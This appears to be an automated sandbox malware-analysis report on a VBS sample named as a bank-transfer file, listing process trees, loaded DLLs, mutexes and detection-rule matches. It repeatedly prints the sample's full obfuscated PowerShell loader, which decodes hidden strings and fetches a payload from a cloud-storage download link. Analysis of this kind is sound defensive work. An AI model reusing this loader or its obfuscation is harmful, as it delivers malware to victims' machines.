';$Skovvogns134=Virksomhedskategoris 'E.ke>Razo ';$Ileitis=Virksomhedskategoris 'ProsiAbsceOut,X D s ';$Historicoreligious='Maffia';$Ornerily='\Nonpunctuating.sem';Crustaceology (Virksomhedskategoris 'unde$ Ti gSnkelOmsto ParbOli a TillAwig:.ranSGry,a HalnKnapd Brue erts L d= Und$TegneTropnTro,vG,ld:KunsaAst pAfmepSmaldExscahomotRistaMicr+Trom$NormO NatrKontnProaeArberRegei SullNonayKons ');Crustaceology (Virksomhedskategoris ' I,t$sinugSamalSkolo Befb Unsa Misl Int: ykvSOr gnudv.uSnadd gnoeBillsTri kHemoaMormf S,etPenneKrent NorsO.os= Ott$Di.iSCr,wtPalsoGrunlIncoeA,tetU de1Bilb1 ra1Trif.Sirss RappApprl Proir kot Nu (Mole$ChinS TrekStraoHo evAghovYngsoOvergP.ernAccrs Dia1Igno3R gr4Flum) ear ');Crustaceology (Virksomhedskategoris ' Con[ Tc NRadieS,avtArbi.PalaSUdsmeU rira kuvArsei AntcKomme AboPNoneo triTeran CaltJackMSnu a ,kan .oraGen.g syeNongr bli] irt:Ove :BefeS Ma.e FigcPolyu Dy rHypeiSpi.tFl wyDeklPisoarGrdeo PentCiteoMinic Frio InklStro Unra= Tyn Hydr[BradN Be eClust Ana.Do.aSCephe RedcbesvuTer rRomaiSig t EntySkumPDis r EntoPrestUdbuoHelicRetvoM.ndlD,unTKondyT rep OuteSka ]Date:Sync:KretTMasslPo ys G.a1Appe2Flyg ');$Stolet111=$Snudeskaftets[0];$Gennemboring=(Virksomhedskategoris ' Div$ MllgFarfL			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848D5C6B6	2_2_00007FF848D5C6B6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FF848D5D462	2_2_00007FF848D5D462
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00B8F0C0	5_2_00B8F0C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00B8F990	5_2_00B8F990
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_00B8ED78	5_2_00B8ED78
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 5_2_06F7C9D8	5_2_06F7C9D8

Source: r20240913TRANSFERENCIA.vbs

Initial sample: Strings found which are bigger than 50

Source: C:\Windows\SysWOW64\msiexec.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5792 -s 2284

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 6532
Source: unknown	Process created: Commandline size = 6532
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 6532	Jump to behavior

Source: amsi64_1900.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi32_6592.amsi.csv, type: OTHER	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 1900, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6592, type: MEMORYSTR	Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution

Source: classification engine

Classification label: mal100.troj.expl.evad.winVBS@9/11@2/2

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Roaming\Nonpunctuating.sem

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3376:120:WilError_03
Source: C:\Windows\SysWOW64\msiexec.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6336:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5792

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2scbleco.jes.ps1

Jump to behavior

Source: unknown

Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\r20240913TRANSFERENCIA.vbs"

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1900
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=6592

Source: C:\Windows\System32\wscript.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\r20240913TRANSFERENCIA.vbs"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Bldningsforstyrrelser Bushwhacked Rkebiskoppers Johnsen Inkompetencers Urubu Brandsikkerheden #>;$Ottetals='bluett';<#Samkvemsrets Polydactylous Skemaden Vkstcentret Forsorgslederens #>;$Erstatningspligts40=$host.PrivateData;If ($Erstatningspligts40) {$Skallesmkkernes++;}function Virksomhedskategoris($Molossian){$Arbejdsdatabasen=$knsttelserne+$Molossian.Length-$Skallesmkkernes;for( $Nedsivningsbekendtgrelsers=4;$Nedsivningsbekendtgrelsers -lt $Arbejdsdatabasen;$Nedsivningsbekendtgrelsers+=5){$Shaftment='Refrygtigere';$Udlaanssal+=$Molossian[$Nedsivningsbekendtgrelsers];}$Udlaanssal;}function Crustaceology($Afdelingsingenirers){ & ($Ileitis) ($Afdelingsingenirers);}$Aarstalslisters=Virksomhedskategoris 'Rea.MRedaoRsonzVariiUddrlEddelBedaaTrip/ Des5Abso. Pi.0 Pie Knu(Bl,eW nciiFoalnSterdD meoT.mtw,ispsAl a SubiN.andTgald Fatu1Tud 0 Inu. Tr 0 Ser;data UnnoWSubsiharvnOtos6Doug4Folk;roko S,rexf,er6St.l4Mani;Pri SenrDermvBeha:Skav1Nuns2Libe1Trib.Co a0Fo k) S.i SejGI treBillcAudakFr.ioTyra/Ku s2Misk0Ops 1Ebra0 Ka 0Vari1Bar,0Biot1Taxa Ls nFWooli rbernor e GulfUdnyoRefexButi/U,ny1 Eft2Malc1 De .Pant0Besr ';$Hjlpemenuen=Virksomhedskategoris 'VibrUSignsCh tEPrieRN pt-F ypaFngsGA,ceERadinSamftSkre ';$Stolet111=Virksomhedskategoris 'La,ehPremtSchit Afkpsteds Sod: Ran/Ulid/Sv edD.sarP.eciBrudvSupeeMiso. scagTreeoSpiroA,sugBe klThoreFr.g. daac StaopaulmRavn/ VanuPrioc.pal? AfpeTegnxDodep StioMyrirgu rtRuna=Nos d ,taoPoppwMed nE enlJerno AndaP podSush&CrimiMaandPaga=Comp1Gamm0Spekm hoSWag dP esA Thr5Vill8 R ntG,grH ondF SupDPrio2MiljBv ndo amguHustrOzonBSpec_ Ce wFolkMAfskx ejlOvervBenzC Old-.lefLAfsvJ Jinj,oppwGa.orOutp4UlemRPiaz ';$Skovvogns134=Virksomhedskategoris 'E.ke>Razo ';$Ileitis=Virksomhedskategoris 'ProsiAbsceOut,X D s ';$Historicoreligious='Maffia';$Ornerily='\Nonpunctuating.sem';Crustaceology (Virksomhedskategoris 'unde$ Ti gSnkelOmsto ParbOli a TillAwig:.ranSGry,a HalnKnapd Brue erts L d= Und$TegneTropnTro,vG,ld:KunsaAst pAfmepSmaldExscahomotRistaMicr+Trom$NormO NatrKontnProaeArberRegei SullNonayKons ');Crustaceology (Virksomhedskategoris ' I,t$sinugSamalSkolo Befb Unsa Misl Int: ykvSOr gnudv.uSnadd gnoeBillsTri kHemoaMormf S,etPenneKrent NorsO.os= Ott$Di.iSCr,wtPalsoGrunlIncoeA,tetU de1Bilb1 ra1Trif.Sirss RappApprl Proir kot Nu (Mole$ChinS TrekStraoHo evAghovYngsoOvergP.ernAccrs Dia1Igno3R gr4Flum) ear ');Crustaceology (Virksomhedskategoris ' Con[ Tc NRadieS,avtArbi.PalaSUdsmeU rira kuvArsei AntcKomme AboPNoneo triTeran CaltJackMSnu a ,kan .oraGen.g syeNongr bli] irt:Ove :BefeS Ma.e FigcPolyu Dy rHypeiSpi.tFl wyDeklPisoarGrdeo PentCiteoMinic Frio InklStro Unra= Tyn Hydr[BradN Be eClust Ana.Do.aSCephe RedcbesvuTer rRomaiSig t EntySkumPDis r EntoPrestUdbuoHelicRetvoM.ndlD,unTKondyT rep OuteSka ]Date:Sync:KretTMasslPo ys G.a1Appe2Flyg ');$Stolet111=$Snudeskaftets[0];$Gennemboring=(Virksomhedskategoris ' Div$ MllgFarfL
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "<#Bldningsforstyrrelser Bushwhacked Rkebiskoppers Johnsen Inkompetencers Urubu Brandsikkerheden #>;$Ottetals='bluett';<#Samkvemsrets Polydactylous Skemaden Vkstcentret Forsorgslederens #>;$Erstatningspligts40=$host.PrivateData;If ($Erstatningspligts40) {$Skallesmkkernes++;}function Virksomhedskategoris($Molossian){$Arbejdsdatabasen=$knsttelserne+$Molossian.Length-$Skallesmkkernes;for( $Nedsivningsbekendtgrelsers=4;$Nedsivningsbekendtgrelsers -lt $Arbejdsdatabasen;$Nedsivningsbekendtgrelsers+=5){$Shaftment='Refrygtigere';$Udlaanssal+=$Molossian[$Nedsivningsbekendtgrelsers];}$Udlaanssal;}function Crustaceology($Afdelingsingenirers){ & ($Ileitis) ($Afdelingsingenirers);}$Aarstalslisters=Virksomhedskategoris 'Rea.MRedaoRsonzVariiUddrlEddelBedaaTrip/ Des5Abso. Pi.0 Pie Knu(Bl,eW nciiFoalnSterdD meoT.mtw,ispsAl a SubiN.andTgald Fatu1Tud 0 Inu. Tr 0 Ser;data UnnoWSubsiharvnOtos6Doug4Folk;roko S,rexf,er6St.l4Mani;Pri SenrDermvBeha:Skav1Nuns2Libe1Trib.Co a0Fo k) S.i SejGI treBillcAudakFr.ioTyra/Ku s2Misk0Ops 1Ebra0 Ka 0Vari1Bar,0Biot1Taxa Ls nFWooli rbernor e GulfUdnyoRefexButi/U,ny1 Eft2Malc1 De .Pant0Besr ';$Hjlpemenuen=Virksomhedskategoris 'VibrUSignsCh tEPrieRN pt-F ypaFngsGA,ceERadinSamftSkre ';$Stolet111=Virksomhedskategoris 'La,ehPremtSchit Afkpsteds Sod: Ran/Ulid/Sv edD.sarP.eciBrudvSupeeMiso. scagTreeoSpiroA,sugBe klThoreFr.g. daac StaopaulmRavn/ VanuPrioc.pal? AfpeTegnxDodep StioMyrirgu rtRuna=Nos d ,taoPoppwMed nE enlJerno AndaP podSush&CrimiMaandPaga=Comp1Gamm0Spekm hoSWag dP esA Thr5Vill8 R ntG,grH ondF SupDPrio2MiljBv ndo amguHustrOzonBSpec_ Ce wFolkMAfskx ejlOvervBenzC Old-.lefLAfsvJ Jinj,oppwGa.orOutp4UlemRPiaz ';$Skovvogns134=Virksomhedskategoris 'E.ke>Razo ';$Ileitis=Virksomhedskategoris 'ProsiAbsceOut,X D s ';$Historicoreligious='Maffia';$Ornerily='\Nonpunctuating.sem';Crustaceology (Virksomhedskategoris 'unde$ Ti gSnkelOmsto ParbOli a TillAwig:.ranSGry,a HalnKnapd Brue erts L d= Und$TegneTropnTro,vG,ld:KunsaAst pAfmepSmaldExscahomotRistaMicr+Trom$NormO NatrKontnProaeArberRegei SullNonayKons ');Crustaceology (Virksomhedskategoris ' I,t$sinugSamalSkolo Befb Unsa Misl Int: ykvSOr gnudv.uSnadd gnoeBillsTri kHemoaMormf S,etPenneKrent NorsO.os= Ott$Di.iSCr,wtPalsoGrunlIncoeA,tetU de1Bilb1 ra1Trif.Sirss RappApprl Proir kot Nu (Mole$ChinS TrekStraoHo evAghovYngsoOvergP.ernAccrs Dia1Igno3R gr4Flum) ear ');Crustaceology (Virksomhedskategoris ' Con[ Tc NRadieS,avtArbi.PalaSUdsmeU rira kuvArsei AntcKomme AboPNoneo triTeran CaltJackMSnu a ,kan .oraGen.g syeNongr bli] irt:Ove :BefeS Ma.e FigcPolyu Dy rHypeiSpi.tFl wyDeklPisoarGrdeo PentCiteoMinic Frio InklStro Unra= Tyn Hydr[BradN Be eClust Ana.Do.aSCephe RedcbesvuTer rRomaiSig t EntySkumPDis r EntoPrestUdbuoHelicRetvoM.ndlD,unTKondyT rep OuteSka ]Date:Sync:KretTMasslPo ys G.a1Appe2Flyg ');$Stolet111=$Snudeskaftets[0];$Gennemboring=(Virksomhedskategoris ' Div$ MllgFarfL
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5792 -s 2284
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Bldningsforstyrrelser Bushwhacked Rkebiskoppers Johnsen Inkompetencers Urubu Brandsikkerheden #>;$Ottetals='bluett';<#Samkvemsrets Polydactylous Skemaden Vkstcentret Forsorgslederens #>;$Erstatningspligts40=$host.PrivateData;If ($Erstatningspligts40) {$Skallesmkkernes++;}function Virksomhedskategoris($Molossian){$Arbejdsdatabasen=$knsttelserne+$Molossian.Length-$Skallesmkkernes;for( $Nedsivningsbekendtgrelsers=4;$Nedsivningsbekendtgrelsers -lt $Arbejdsdatabasen;$Nedsivningsbekendtgrelsers+=5){$Shaftment='Refrygtigere';$Udlaanssal+=$Molossian[$Nedsivningsbekendtgrelsers];}$Udlaanssal;}function Crustaceology($Afdelingsingenirers){ & ($Ileitis) ($Afdelingsingenirers);}$Aarstalslisters=Virksomhedskategoris 'Rea.MRedaoRsonzVariiUddrlEddelBedaaTrip/ Des5Abso. Pi.0 Pie Knu(Bl,eW nciiFoalnSterdD meoT.mtw,ispsAl a SubiN.andTgald Fatu1Tud 0 Inu. Tr 0 Ser;data UnnoWSubsiharvnOtos6Doug4Folk;roko S,rexf,er6St.l4Mani;Pri SenrDermvBeha:Skav1Nuns2Libe1Trib.Co a0Fo k) S.i SejGI treBillcAudakFr.ioTyra/Ku s2Misk0Ops 1Ebra0 Ka 0Vari1Bar,0Biot1Taxa Ls nFWooli rbernor e GulfUdnyoRefexButi/U,ny1 Eft2Malc1 De .Pant0Besr ';$Hjlpemenuen=Virksomhedskategoris 'VibrUSignsCh tEPrieRN pt-F ypaFngsGA,ceERadinSamftSkre ';$Stolet111=Virksomhedskategoris 'La,ehPremtSchit Afkpsteds Sod: Ran/Ulid/Sv edD.sarP.eciBrudvSupeeMiso. scagTreeoSpiroA,sugBe klThoreFr.g. daac StaopaulmRavn/ VanuPrioc.pal? AfpeTegnxDodep StioMyrirgu rtRuna=Nos d ,taoPoppwMed nE enlJerno AndaP podSush&CrimiMaandPaga=Comp1Gamm0Spekm hoSWag dP esA Thr5Vill8 R ntG,grH ondF SupDPrio2MiljBv ndo amguHustrOzonBSpec_ Ce wFolkMAfskx ejlOvervBenzC Old-.lefLAfsvJ Jinj,oppwGa.orOutp4UlemRPiaz ';$Skovvogns134=Virksomhedskategoris 'E.ke>Razo ';$Ileitis=Virksomhedskategoris 'ProsiAbsceOut,X D s ';$Historicoreligious='Maffia';$Ornerily='\Nonpunctuating.sem';Crustaceology (Virksomhedskategoris 'unde$ Ti gSnkelOmsto ParbOli a TillAwig:.ranSGry,a HalnKnapd Brue erts L d= Und$TegneTropnTro,vG,ld:KunsaAst pAfmepSmaldExscahomotRistaMicr+Trom$NormO NatrKontnProaeArberRegei SullNonayKons ');Crustaceology (Virksomhedskategoris ' I,t$sinugSamalSkolo Befb Unsa Misl Int: ykvSOr gnudv.uSnadd gnoeBillsTri kHemoaMormf S,etPenneKrent NorsO.os= Ott$Di.iSCr,wtPalsoGrunlIncoeA,tetU de1Bilb1 ra1Trif.Sirss RappApprl Proir kot Nu (Mole$ChinS TrekStraoHo evAghovYngsoOvergP.ernAccrs Dia1Igno3R gr4Flum) ear ');Crustaceology (Virksomhedskategoris ' Con[ Tc NRadieS,avtArbi.PalaSUdsmeU rira kuvArsei AntcKomme AboPNoneo triTeran CaltJackMSnu a ,kan .oraGen.g syeNongr bli] irt:Ove :BefeS Ma.e FigcPolyu Dy rHypeiSpi.tFl wyDeklPisoarGrdeo PentCiteoMinic Frio InklStro Unra= Tyn Hydr[BradN Be eClust Ana.Do.aSCephe RedcbesvuTer rRomaiSig t EntySkumPDis r EntoPrestUdbuoHelicRetvoM.ndlD,unTKondyT rep OuteSka ]Date:Sync:KretTMasslPo ys G.a1Appe2Flyg ');$Stolet111=$Snudeskaftets[0];$Gennemboring=(Virksomhedskategoris ' Div$ MllgFarfL	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\syswow64\msiexec.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
